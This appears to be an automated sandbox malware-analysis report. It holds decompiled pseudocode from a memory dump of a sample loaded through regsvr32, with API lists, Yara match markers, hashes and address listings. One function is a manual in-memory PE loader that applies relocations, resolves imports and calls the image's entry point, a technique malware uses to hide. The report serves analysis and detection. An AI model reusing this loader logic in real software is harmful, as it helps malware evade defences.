								_push( *_t180);
								E05B9AA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E05B9B025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E05B9B025(_t166, _t192);
								}
								_t76 = E05B9A065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E05B9AA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x5baf81c; // 0x5d5fbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E05BA0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x5baf81c; // 0x5d5fbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E05B9F0DE(_t169);
										}
										E05B9584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x5baf81c; // 0x5d5fbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E05B9109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E05B98BAF( &_v596);
												 *_t187 = 0x5bac9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x5bac9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x5d5fe10
									_t142 = _t40;
									L25:
									_t78 = E05B95AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x5baf81c; // 0x5d5fbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E05B9D11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x5baf818; // 0x5d5f8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x5baf818; // 0x5d5f8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E05B98BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E05B98BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E05B9F1F6(_v600, _t161);
							goto L12;
						}
						E05B9F1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E05B93097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E05B95F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                        0x05b950b3
                                                                                                                                                                        0x05b950c0
                                                                                                                                                                        0x05b950cb
                                                                                                                                                                        0x05b950d0
                                                                                                                                                                        0x05b950d2
                                                                                                                                                                        0x05b950d5
                                                                                                                                                                        0x05b950da
                                                                                                                                                                        0x05b950df
                                                                                                                                                                        0x05b950e2
                                                                                                                                                                        0x05b950ec
                                                                                                                                                                        0x05b950ee
                                                                                                                                                                        0x05b950f3
                                                                                                                                                                        0x05b950fb
                                                                                                                                                                        0x05b95104
                                                                                                                                                                        0x05b95104
                                                                                                                                                                        0x05b95111
                                                                                                                                                                        0x05b9512c
                                                                                                                                                                        0x05b9512e
                                                                                                                                                                        0x05b95133
                                                                                                                                                                        0x05b95138
                                                                                                                                                                        0x05b9513e
                                                                                                                                                                        0x05b9514d
                                                                                                                                                                        0x05b9516c
                                                                                                                                                                        0x05b9516e
                                                                                                                                                                        0x05b95173
                                                                                                                                                                        0x05b95174
                                                                                                                                                                        0x05b9517a
                                                                                                                                                                        0x05b9517f
                                                                                                                                                                        0x05b95186
                                                                                                                                                                        0x05b95190
                                                                                                                                                                        0x05b95192
                                                                                                                                                                        0x05b95193
                                                                                                                                                                        0x05b9519e
                                                                                                                                                                        0x05b951a0
                                                                                                                                                                        0x05b951a3
                                                                                                                                                                        0x05b951a8
                                                                                                                                                                        0x05b951af
                                                                                                                                                                        0x05b951d3
                                                                                                                                                                        0x05b951d3
                                                                                                                                                                        0x05b951d8
                                                                                                                                                                        0x05b9523f
                                                                                                                                                                        0x05b95244
                                                                                                                                                                        0x05b95246
                                                                                                                                                                        0x05b95250
                                                                                                                                                                        0x05b95255
                                                                                                                                                                        0x05b95255
                                                                                                                                                                        0x05b9526f
                                                                                                                                                                        0x05b95271
                                                                                                                                                                        0x05b95274
                                                                                                                                                                        0x05b95276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9527c
                                                                                                                                                                        0x05b95283
                                                                                                                                                                        0x05b95286
                                                                                                                                                                        0x05b9528f
                                                                                                                                                                        0x05b95294
                                                                                                                                                                        0x05b9529a
                                                                                                                                                                        0x05b9529f
                                                                                                                                                                        0x05b952a4
                                                                                                                                                                        0x05b952a8
                                                                                                                                                                        0x05b952aa
                                                                                                                                                                        0x05b952ae
                                                                                                                                                                        0x05b952ae
                                                                                                                                                                        0x05b952b3
                                                                                                                                                                        0x05b952b6
                                                                                                                                                                        0x05b952b8
                                                                                                                                                                        0x05b952bc
                                                                                                                                                                        0x05b952bc
                                                                                                                                                                        0x05b952c3
                                                                                                                                                                        0x05b952c8
                                                                                                                                                                        0x05b952cc
                                                                                                                                                                        0x05b952cf
                                                                                                                                                                        0x05b952d4
                                                                                                                                                                        0x05b952da
                                                                                                                                                                        0x05b952db
                                                                                                                                                                        0x05b95303
                                                                                                                                                                        0x05b95309
                                                                                                                                                                        0x05b95310
                                                                                                                                                                        0x05b9531f
                                                                                                                                                                        0x05b95324
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95324
                                                                                                                                                                        0x05b95312
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b952dd
                                                                                                                                                                        0x05b952dd
                                                                                                                                                                        0x05b952e2
                                                                                                                                                                        0x05b952e9
                                                                                                                                                                        0x05b9532e
                                                                                                                                                                        0x05b9532e
                                                                                                                                                                        0x05b95335
                                                                                                                                                                        0x05b95339
                                                                                                                                                                        0x05b9533a
                                                                                                                                                                        0x05b9533a
                                                                                                                                                                        0x05b95344
                                                                                                                                                                        0x05b95349
                                                                                                                                                                        0x05b9534c
                                                                                                                                                                        0x05b9534d
                                                                                                                                                                        0x05b9534f
                                                                                                                                                                        0x05b95351
                                                                                                                                                                        0x05b95356
                                                                                                                                                                        0x05b9535d
                                                                                                                                                                        0x05b953a0
                                                                                                                                                                        0x05b9535f
                                                                                                                                                                        0x05b95364
                                                                                                                                                                        0x05b9536c
                                                                                                                                                                        0x05b95370
                                                                                                                                                                        0x05b9537b
                                                                                                                                                                        0x05b95386
                                                                                                                                                                        0x05b9538e
                                                                                                                                                                        0x05b95392
                                                                                                                                                                        0x05b9539a
                                                                                                                                                                        0x05b9539a
                                                                                                                                                                        0x05b9535d
                                                                                                                                                                        0x05b953a6
                                                                                                                                                                        0x05b953a9
                                                                                                                                                                        0x05b953ab
                                                                                                                                                                        0x05b953b1
                                                                                                                                                                        0x05b953b1
                                                                                                                                                                        0x05b953b3
                                                                                                                                                                        0x05b953b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b953b3
                                                                                                                                                                        0x05b952eb
                                                                                                                                                                        0x05b952eb
                                                                                                                                                                        0x05b952f1
                                                                                                                                                                        0x05b952f3
                                                                                                                                                                        0x05b952f8
                                                                                                                                                                        0x05b952f8
                                                                                                                                                                        0x05b952fa
                                                                                                                                                                        0x05b95329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95329
                                                                                                                                                                        0x05b952fc
                                                                                                                                                                        0x05b9518a
                                                                                                                                                                        0x05b9518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9518a
                                                                                                                                                                        0x05b952db
                                                                                                                                                                        0x05b951de
                                                                                                                                                                        0x05b951ec
                                                                                                                                                                        0x05b951ff
                                                                                                                                                                        0x05b95204
                                                                                                                                                                        0x05b9520a
                                                                                                                                                                        0x05b9520c
                                                                                                                                                                        0x05b95224
                                                                                                                                                                        0x05b95229
                                                                                                                                                                        0x05b95232
                                                                                                                                                                        0x05b95238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95238
                                                                                                                                                                        0x05b95214
                                                                                                                                                                        0x05b9521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9521d
                                                                                                                                                                        0x05b951b1
                                                                                                                                                                        0x05b951b1
                                                                                                                                                                        0x05b951b7
                                                                                                                                                                        0x05b951b9
                                                                                                                                                                        0x05b951c6
                                                                                                                                                                        0x05b951c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b951ca
                                                                                                                                                                        0x05b951ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b951ce
                                                                                                                                                                        0x05b951bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b951bf
                                                                                                                                                                        0x05b95188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95113
                                                                                                                                                                        0x05b9511e
                                                                                                                                                                        0x05b95124
                                                                                                                                                                        0x05b95126
                                                                                                                                                                        0x05b953b5
                                                                                                                                                                        0x05b953b9
                                                                                                                                                                        0x05b953be
                                                                                                                                                                        0x05b953c0
                                                                                                                                                                        0x05b953c6
                                                                                                                                                                        0x05b953c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: 2f576db397b43633e7f97526e30c01479f83d3229e44e2972761f6df70f8b44c
                                                                                                                                                                        • Instruction ID: 2a24e29c16fc47b6c4cc5f132ab0bb96266b8494f3ce8510a0f9dccaf9b5d8c7
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f576db397b43633e7f97526e30c01479f83d3229e44e2972761f6df70f8b44c
                                                                                                                                                                        • Instruction Fuzzy Hash: AA81D1717483009BDB2AEB20E849FBA77E6EF85310F2445BDF456872D0EF70B8458A91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9DE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E05B9DE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x5bac9a0);
						_t36 = E05B99A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E05B98BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                        0x05b9de2f
                                                                                                                                                                        0x05b9de36
                                                                                                                                                                        0x05b9de39
                                                                                                                                                                        0x05b9de46
                                                                                                                                                                        0x05b9de4c
                                                                                                                                                                        0x05b9de4f
                                                                                                                                                                        0x05b9de51
                                                                                                                                                                        0x05b9de56
                                                                                                                                                                        0x05b9df2e
                                                                                                                                                                        0x05b9df2e
                                                                                                                                                                        0x05b9df2e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9de5c
                                                                                                                                                                        0x05b9de5c
                                                                                                                                                                        0x05b9de5c
                                                                                                                                                                        0x05b9de5f
                                                                                                                                                                        0x05b9de65
                                                                                                                                                                        0x05b9de81
                                                                                                                                                                        0x05b9de88
                                                                                                                                                                        0x05b9de8e
                                                                                                                                                                        0x05b9de92
                                                                                                                                                                        0x05b9dea6
                                                                                                                                                                        0x05b9dea6
                                                                                                                                                                        0x05b9dea9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9de94
                                                                                                                                                                        0x05b9de94
                                                                                                                                                                        0x05b9de99
                                                                                                                                                                        0x05b9de9d
                                                                                                                                                                        0x05b9de9d
                                                                                                                                                                        0x05b9dea1
                                                                                                                                                                        0x05b9dea2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9de94
                                                                                                                                                                        0x05b9deaa
                                                                                                                                                                        0x05b9deaa
                                                                                                                                                                        0x05b9dead
                                                                                                                                                                        0x05b9deae
                                                                                                                                                                        0x05b9deb5
                                                                                                                                                                        0x05b9debf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9dec1
                                                                                                                                                                        0x05b9dec7
                                                                                                                                                                        0x05b9decb
                                                                                                                                                                        0x05b9df24
                                                                                                                                                                        0x05b9ded4
                                                                                                                                                                        0x05b9dee1
                                                                                                                                                                        0x05b9dee7
                                                                                                                                                                        0x05b9dee9
                                                                                                                                                                        0x05b9def0
                                                                                                                                                                        0x05b9def6
                                                                                                                                                                        0x05b9defe
                                                                                                                                                                        0x05b9df06
                                                                                                                                                                        0x05b9df12
                                                                                                                                                                        0x05b9df18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9df2a
                                                                                                                                                                        0x05b9deb7
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 05B9DE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 05B9DE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 05B9DE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 05B9DEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 05B9DF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 05B9DF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 6fb362eb8e16c616ce1006c21553005c13df6d66510747c925cec277b5dd24e5
                                                                                                                                                                        • Instruction ID: 3baeab418901cbaeebf7c4cb30cea1707373ae13c5b9ff57ca3cc669df847e7e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fb362eb8e16c616ce1006c21553005c13df6d66510747c925cec277b5dd24e5
                                                                                                                                                                        • Instruction Fuzzy Hash: E831CF71904516EFDF28AB5AC889AAEB7B9FF15350F1144ADF406E3054EB70BA808B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9E656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9E66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 05B9E672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9E686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9E701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9E704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9E709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        • Opcode ID: b531c44483eb40dabba51ad15752e3f9380ac5a4f5b12a2da19870b20d45a502
                                                                                                                                                                        • Instruction ID: 11b8b688de6a673687aa13aeec687915ea0460c0adc4d5dbc1d7fb97113eb0ee
                                                                                                                                                                        • Opcode Fuzzy Hash: b531c44483eb40dabba51ad15752e3f9380ac5a4f5b12a2da19870b20d45a502
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B211C75900218AFDF04DFA8CC88DAEBBBDFF48654B1044A9F505E7240DA71AE01CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA3D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E05BA3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                        0x05ba3d6f
                                                                                                                                                                        0x05ba3d7c
                                                                                                                                                                        0x05ba3d82
                                                                                                                                                                        0x05ba3d8b
                                                                                                                                                                        0x05ba3d8e
                                                                                                                                                                        0x05ba3d91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba3e82
                                                                                                                                                                        0x05ba3e86
                                                                                                                                                                        0x05ba3e88
                                                                                                                                                                        0x05ba3e96
                                                                                                                                                                        0x05ba3fb4
                                                                                                                                                                        0x05ba3fb8
                                                                                                                                                                        0x05ba407d
                                                                                                                                                                        0x05ba4086
                                                                                                                                                                        0x05ba4089
                                                                                                                                                                        0x05ba408d
                                                                                                                                                                        0x05ba4093
                                                                                                                                                                        0x05ba409b
                                                                                                                                                                        0x05ba409b
                                                                                                                                                                        0x05ba40a3
                                                                                                                                                                        0x05ba40b1
                                                                                                                                                                        0x05ba40b4
                                                                                                                                                                        0x05ba40b8
                                                                                                                                                                        0x05ba40be
                                                                                                                                                                        0x05ba40ce
                                                                                                                                                                        0x05ba40f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba40fb
                                                                                                                                                                        0x05ba40d4
                                                                                                                                                                        0x05ba40e5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba40f3
                                                                                                                                                                        0x05ba40f7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba40f3
                                                                                                                                                                        0x05ba40e7
                                                                                                                                                                        0x05ba40eb
                                                                                                                                                                        0x05ba40f0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba40f0
                                                                                                                                                                        0x05ba40d6
                                                                                                                                                                        0x05ba40da
                                                                                                                                                                        0x05ba40dc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba40dc
                                                                                                                                                                        0x05ba40c0
                                                                                                                                                                        0x05ba40c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba40c6
                                                                                                                                                                        0x05ba3fbe
                                                                                                                                                                        0x05ba3fc2
                                                                                                                                                                        0x05ba3fc4
                                                                                                                                                                        0x05ba3fd2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba3fd8
                                                                                                                                                                        0x05ba3fe1
                                                                                                                                                                        0x05ba3fef
                                                                                                                                                                        0x05ba3ffb
                                                                                                                                                                        0x05ba4007
                                                                                                                                                                        0x05ba4010
                                                                                                                                                                        0x05ba4013
                                                                                                                                                                        0x05ba4017
                                                                                                                                                                        0x05ba4019
                                                                                                                                                                        0x05ba4026
                                                                                                                                                                        0x05ba403a
                                                                                                                                                                        0x05ba4049
                                                                                                                                                                        0x05ba405a
                                                                                                                                                                        0x05ba4023
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4023
                                                                                                                                                                        0x05ba405c
                                                                                                                                                                        0x05ba4060
                                                                                                                                                                        0x05ba4065
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4065
                                                                                                                                                                        0x05ba4070
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4072
                                                                                                                                                                        0x05ba4076
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4078
                                                                                                                                                                        0x05ba3e9c
                                                                                                                                                                        0x05ba3ea5
                                                                                                                                                                        0x05ba3eb3
                                                                                                                                                                        0x05ba3eb6
                                                                                                                                                                        0x05ba3ed3
                                                                                                                                                                        0x05ba3eda
                                                                                                                                                                        0x05ba3eec
                                                                                                                                                                        0x05ba3eec
                                                                                                                                                                        0x05ba3ef3
                                                                                                                                                                        0x05ba3f03
                                                                                                                                                                        0x05ba3f1b
                                                                                                                                                                        0x05ba3f05
                                                                                                                                                                        0x05ba3f0d
                                                                                                                                                                        0x05ba3f0d
                                                                                                                                                                        0x05ba3f1e
                                                                                                                                                                        0x05ba3f22
                                                                                                                                                                        0x05ba3f32
                                                                                                                                                                        0x05ba3f55
                                                                                                                                                                        0x05ba3f67
                                                                                                                                                                        0x05ba3f34
                                                                                                                                                                        0x05ba3f48
                                                                                                                                                                        0x05ba3f48
                                                                                                                                                                        0x05ba3f71
                                                                                                                                                                        0x05ba3f8d
                                                                                                                                                                        0x05ba3f73
                                                                                                                                                                        0x05ba3f82
                                                                                                                                                                        0x05ba3f82
                                                                                                                                                                        0x05ba3f95
                                                                                                                                                                        0x05ba3f9e
                                                                                                                                                                        0x05ba3f9e
                                                                                                                                                                        0x05ba3fac
